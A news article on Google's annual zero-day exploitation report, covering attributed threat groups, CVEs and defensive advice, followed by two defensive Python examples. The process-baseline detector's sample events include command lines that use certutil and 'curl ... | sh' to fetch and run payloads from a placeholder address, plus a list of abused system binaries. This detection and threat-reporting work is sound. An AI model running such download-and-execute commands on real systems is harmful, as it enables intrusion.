Zero-day exploits hit enterprises faster and harder

Google tracked 90 vulnerabilities exploited as zero-days last year, with Chinese cyberespionage groups doubling their count from 2024 and commercial surveillance vendors overtaking state-sponsored hackers for the first time. Nearly half of the recorded zero-days targeted enterprise technologies such as security appliances, VPNs, networking devices, and enterprise software platforms.

“Increased exploitation of security and networking devices highlights the critical risk that can be posed by trusted edge infrastructure, while targeting of enterprise software exhibits the value of highly interconnected platforms that provide privileged access across networks and data assets,” the Google Threat Intelligence Group (GTIG) said in its annual Zero-Days in Review report.

This continues a shift in attacker initial-access patterns that has intensified over the past few years. Enterprise technologies accounted for 44% of all zero-days in 2024 and 48% (43 of 90) last year.

China-linked groups were responsible for at least 10 of the 16 zero-days attributed to state-sponsored threat actors in 2025, double the number attributed to them in 2024. This keeps China as the most prolific user of zero-day exploits of the past decade.

However, commercial surveillance vendors (CSVs) are also an ever-growing source of zero-day exploits. CSVs sell their products to law enforcement and intelligence agencies around the world, including authoritarian regimes that use the software to crack down on activists. CSVs provide zero-days they discover to their customers to facilitate the deployment of their spyware on targets’ mobile phones and computers.

Defenders face shrinking response windows

Vulnerability exploitation remains the top initial access method in incident response investigations conducted by Google’s Mandiant division, ahead of stolen credentials and phishing. With nearly half of last year’s zero-days hitting enterprise infrastructure, organizations that delay patching even by hours once a fix is available face growing risk, and until a fix exists they are relying entirely on compensating controls and detection.

The speed at which exploit code spreads between groups is also accelerating, GTIG warned. Historically zero-day exploits were closely held by the most resourced teams, but an increasing number of PRC-linked groups are now exploiting the same vulnerabilities, suggesting increased exploit sharing or collaborative development.

The pattern extends to n-day vulnerabilities, where GTIG observed a shrinking gap between public disclosure and widespread exploitation by multiple groups. Data from vulnerability intelligence firm VulnCheck shows that nearly a third of the 884 vulnerabilities known to be exploited last year were attacked on or before the day they were publicly disclosed, up from about a quarter in 2024.

“Barely 1% of vulnerabilities disclosed in 2025 were ever exploited, but those that were moved faster, hit harder, and increasingly did so before defenders even had a chance to react,” VulnCheck CTO Jacob Baines said.

GTIG researchers expect AI to compress these timelines further this year, with adversaries using it to accelerate reconnaissance, vulnerability discovery, and exploit development. “Defenders should prepare for when, not if, a compromise happens,” the researchers warned.

Enterprise environments under siege

Chinese threat actors continued to display a preference for targets that are difficult to monitor and allow persistent access to strategic networks. Notable examples include the groups that GTIG tracks as UNC5221, which exploited a flaw in Ivanti Connect Secure (CVE-2025-0282), and UNC3886, which exploited a vulnerability in Juniper routers (CVE-2025-21590).

Another Chinese group tracked as UNC6201, which is known for the BRICKSTORM and GRIMBOLT backdoors, stood out because it targeted intellectual property such as source code and proprietary development documents from technology companies. Such assets could be used to discover new vulnerabilities in the victims’ products, posing a risk to their downstream customers.

Security and networking products accounted for 21 of the 43 enterprise-targeted zero-days in 2025, and at least 14 targeted edge devices such as routers, switches, and security appliances. These devices typically cannot run endpoint detection and response agents, so compromises on them often go unnoticed.

“A lack of input validation and incomplete authorization processes were common flaws within these products, demonstrating how basic systemic failures continue to persist, but are fixable with proper implementation standards and approaches,” the GTIG researchers wrote.

Financially motivated threat groups, including ransomware gangs, also targeted enterprise technologies and accounted for nine zero-days in 2025, nearly double the five attributed to them in 2024.

FIN11, the group behind the CL0P ransomware, targeted two zero-day flaws in Oracle E-Business Suite last year (CVE-2025-61882 and CVE-2025-61884). Storm-1175, a group associated with Medusa ransomware, exploited a vulnerability in GoAnywhere MFT (CVE-2025-10035).

Meanwhile UNC2165, a financially motivated Russian group that overlaps with public reporting on Evil Corp, used a zero-day WinRAR vulnerability (CVE-2025-8088). The same vulnerability was exploited by another Russian group tracked as UNC4895 or RomCom that conducts both financially motivated and espionage operations.

According to VulnCheck’s data, more than half of the 39 CVEs linked to ransomware attacks in 2025 were exploited as zero-days and about a third had no public or commercial exploit code as of January 2026, suggesting that these groups are developing their own exploits and keeping them private.

Spyware vendors surpass state-backed hackers for the first time

For the first time since GTIG began tracking zero-day exploitation, commercial surveillance vendors had more attributed zero-days than traditional state-sponsored espionage groups. The milestone reflects a gradual shift the researchers said they’ve observed over the past several years.

CSVs maintained their focus on mobile devices and browsers, adapting their exploit chains to bypass security improvements that platform vendors have introduced over time. Multiple exploit chains discovered in 2025 required three or more chained vulnerabilities to achieve a single objective on mobile devices, a sign that platform hardening is raising the cost of exploitation but not stopping it.

Operating system vulnerabilities accounted for 39 zero-days, with 15 impacting mobile OSes. Browsers fell below 10%, a historic low that GTIG attributed to hardening efforts, although the researchers noted the possibility that the groups have better operational security and some exploits have been missed.

Microsoft was the most targeted vendor, with 25 zero-days exploited across its products, followed by Google with 11, Apple with eight, and Cisco and Fortinet with four each. Twenty vendors were hit by a single zero-day each, illustrating how widely attackers are casting their net across the enterprise software landscape.

Prepare for zero-day exploitation

“Prioritization is a consistent struggle for most organizations due to limited resources requiring deciding what solutions are implemented — and for every choice of where to put resources, a different security need is neglected,” the GTIG researchers said. “Know your threats and your attack surface in order to prioritize decisions for best defending your systems and infrastructure.”

Recommendations include segmenting firewalls, VPNs, and DMZ infrastructure from core network assets and domain controllers to limit lateral movement when a perimeter device is breached.

Enterprises are also advised to establish baselines for system processes in order to flag living-off-the-land activity, and to deploy canary tokens to detect lateral movement. Maintaining a software bill of materials to identify which systems are affected when a new zero-day is disclosed is also recommended, particularly for widely used libraries where the blast radius is difficult to gauge.
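The process-baseline recommendation is easiest to understand as detection logic. The following is an added example, not code from GTIG’s report or from any vendor product: it learns which parent/child process pairs are normal on each host from a learning window, then scores new process-creation events, escalating when an unexpected child is a commonly abused living-off-the-land binary or is spawned by a network-facing service such as a web server. The host names, the event lines, the LOLBin subset and the list of exposed parents are all constructed for illustration.

```python
"""Flag process launches that deviate from a learned per-host baseline.

Added example for the 'baseline system processes to catch living-off-the-land
activity' recommendation; it is not code from GTIG's report. The baseline,
the LOLBin list, the exposed-parent list and the event lines below are
constructed for illustration.
"""
import json
from collections import defaultdict

# Binaries that are legitimate on every host but commonly abused after a
# compromise. Illustrative subset, not an authoritative list.
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "powershell.exe", "bitsadmin.exe", "wmic.exe"}

# Parents that face the network: an unexpected child of one of these is the
# classic post-exploitation signal on an appliance or web tier. Constructed list.
EXPOSED_PARENTS = {"w3wp.exe", "httpd", "nginx", "tomcat", "java.exe"}

# Constructed process-creation records from a learning window.
BASELINE_EVENTS = [
    {"host": "web01", "parent": "services.exe", "image": "svchost.exe"},
    {"host": "web01", "parent": "w3wp.exe", "image": "conhost.exe"},
    {"host": "web01", "parent": "explorer.exe", "image": "powershell.exe"},
    {"host": "vpn01", "parent": "init", "image": "sshd"},
]

# Constructed events from the detection window, as newline-delimited JSON.
# 203.0.113.5 is a documentation (TEST-NET-3) address.
NEW_EVENTS_NDJSON = """\
{"host":"web01","parent":"services.exe","image":"svchost.exe","cmdline":"svchost.exe -k netsvcs"}
{"host":"web01","parent":"w3wp.exe","image":"cmd.exe","cmdline":"cmd.exe /c whoami"}
{"host":"web01","parent":"w3wp.exe","image":"certutil.exe","cmdline":"certutil.exe -urlcache -f http://203.0.113.5/a.exe a.exe"}
{"host":"web01","parent":"explorer.exe","image":"powershell.exe","cmdline":"powershell.exe Get-Process"}
{"host":"vpn01","parent":"sshd","image":"bash","cmdline":"bash -c 'curl http://203.0.113.5/x | sh'"}
"""


def build_baseline(events):
    """Return {host: {(parent, image), ...}} learned from the learning window."""
    baseline = defaultdict(set)
    for e in events:
        baseline[e["host"]].add((e["parent"].lower(), e["image"].lower()))
    return baseline


def score_event(event, baseline):
    """Return (severity, reasons) for one process-creation event.

    severity: 0 = pair seen in baseline; 1 = pair never seen on this host;
    2 = unseen pair where the child is a LOLBin or the parent is network-facing;
    3 = unseen pair with both signals.
    """
    host = event["host"]
    parent = event["parent"].lower()
    image = event["image"].lower()
    if (parent, image) in baseline.get(host, set()):
        return 0, []
    reasons = ["parent/child pair not in baseline for this host"]
    if image in LOLBINS:
        reasons.append("child is a commonly abused LOLBin")
    if parent in EXPOSED_PARENTS:
        reasons.append("parent is a network-facing service")
    return len(reasons), reasons


def detect(ndjson, baseline_events):
    """Compare NDJSON event lines against the baseline; return alerts, worst first."""
    baseline = build_baseline(baseline_events)
    alerts = []
    for line in ndjson.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        severity, reasons = score_event(event, baseline)
        if severity:
            alerts.append({"host": event["host"], "parent": event["parent"],
                           "image": event["image"], "severity": severity,
                           "reasons": reasons, "cmdline": event["cmdline"]})
    return sorted(alerts, key=lambda a: -a["severity"])


if __name__ == "__main__":
    for a in detect(NEW_EVENTS_NDJSON, BASELINE_EVENTS):
        print(f'sev={a["severity"]} {a["host"]}: {a["parent"]} -> {a["image"]} '
              f'({"; ".join(a["reasons"])})')
```

Run against the constructed window, the web server spawning certutil to fetch a payload scores highest, the web server spawning cmd.exe is next, and a bash child of sshd on the VPN host is flagged at low severity only because the baseline had never seen that pair; the baseline events themselves produce no alert. In practice the baseline would be learned from a few weeks of EDR or Sysmon telemetry per host role rather than a hand-written list.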

Security leaders should also define emergency patching processes that can bypass standard change management when critical vulnerabilities require immediate action. When no patch is available, security teams should isolate affected systems and components with stop-gap measures such as disabling specific services or blocking ports at the perimeter.

GTIG urges organizations to maintain a real-time asset inventory and to design system architectures with segmentation and least-privilege access built in rather than bolted on.
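The SBOM and asset-inventory recommendations come together when a new vulnerability lands: the question is which hosts carry an affected version of the component and which of those are reachable from the internet. The following is an added example, not code from GTIG’s report or any product. It matches a freshly published advisory against per-host SBOMs laid out like CycloneDX JSON components (name, version, purl) and ranks the hits using an asset inventory. The hosts, the asset records, the package name examplelib and the advisory identifier EXAMPLE-2025-0001 are constructed; the version comparison handles dotted numeric versions with an optional pre-release suffix, which goes beyond the single range in any one advisory.

```python
"""Match a newly disclosed vulnerability against per-host SBOMs and an asset inventory.

Added example for the 'SBOM plus real-time asset inventory' recommendations;
not code from GTIG's report. The SBOM documents follow the CycloneDX JSON
component layout (name/version/purl) but are constructed, as are the hosts,
the advisory and the package name 'examplelib'.
"""
import json
import re

# Constructed asset inventory: which hosts are reachable from the internet.
ASSETS = {
    "vpn01": {"internet_facing": True, "owner": "netops"},
    "app02": {"internet_facing": False, "owner": "platform"},
    "build03": {"internet_facing": False, "owner": "ci"},
}

# Constructed CycloneDX-style SBOMs keyed by host; only the fields used here.
SBOMS = {
    "vpn01": json.dumps({"bomFormat": "CycloneDX", "components": [
        {"name": "examplelib", "version": "2.4.1", "purl": "pkg:generic/examplelib@2.4.1"},
        {"name": "zlib", "version": "1.3.1", "purl": "pkg:generic/zlib@1.3.1"}]}),
    "app02": json.dumps({"bomFormat": "CycloneDX", "components": [
        {"name": "examplelib", "version": "2.5.0", "purl": "pkg:pypi/examplelib@2.5.0"}]}),
    "build03": json.dumps({"bomFormat": "CycloneDX", "components": [
        {"name": "examplelib", "version": "2.4.0-rc1", "purl": "pkg:npm/examplelib@2.4.0-rc1"},
        {"name": "openssl", "version": "3.0.13", "purl": "pkg:generic/openssl@3.0.13"}]}),
}

# Constructed advisory: affected range is [introduced, fixed).
ADVISORY = {"id": "EXAMPLE-2025-0001", "package": "examplelib",
            "introduced": "2.0.0", "fixed": "2.5.0"}


def version_key(v):
    """Turn '2.4.0-rc1' into a comparable key.

    Dotted numeric parts compare numerically and are padded so 2.4 == 2.4.0;
    a pre-release suffix sorts before the bare release (2.4.0-rc1 < 2.4.0).
    """
    m = re.match(r"^(\d+(?:\.\d+)*)(?:[-+](.*))?$", v)
    if not m:
        raise ValueError(f"unparseable version: {v}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums += (0,) * (4 - len(nums))
    prerelease = m.group(2)
    # Nested tuple keeps ints and strings in separate positions.
    return (nums, 0, prerelease) if prerelease else (nums, 1, "")


def is_affected(version, advisory):
    """True when version lies in [introduced, fixed)."""
    lo = version_key(advisory["introduced"])
    hi = version_key(advisory["fixed"])
    return lo <= version_key(version) < hi


def affected_hosts(sboms, assets, advisory):
    """Return matching hosts with context, internet-facing hosts first."""
    hits = []
    for host, doc in sboms.items():
        for comp in json.loads(doc).get("components", []):
            if comp.get("name") != advisory["package"]:
                continue
            if is_affected(comp["version"], advisory):
                asset = assets.get(host, {})
                hits.append({"host": host, "version": comp["version"],
                             "purl": comp.get("purl"),
                             "internet_facing": asset.get("internet_facing", False),
                             "owner": asset.get("owner")})
    return sorted(hits, key=lambda h: (not h["internet_facing"], h["host"]))


if __name__ == "__main__":
    for h in affected_hosts(SBOMS, ASSETS, ADVISORY):
        exposure = "INTERNET-FACING" if h["internet_facing"] else "internal"
        print(f'{ADVISORY["id"]}: {h["host"]} ({exposure}, owner={h["owner"]}) '
              f'runs {h["purl"]}')
```

With the constructed data the VPN appliance, which is internet-facing and runs 2.4.1, sorts to the top; the build server on a 2.4.0 pre-release is also inside the range, while the application host already on the fixed 2.5.0 is excluded. A host missing from the inventory is treated as internal, which is the wrong default for an unknown asset, so the real-world check is to flag any SBOM host absent from the inventory rather than silently deprioritising it.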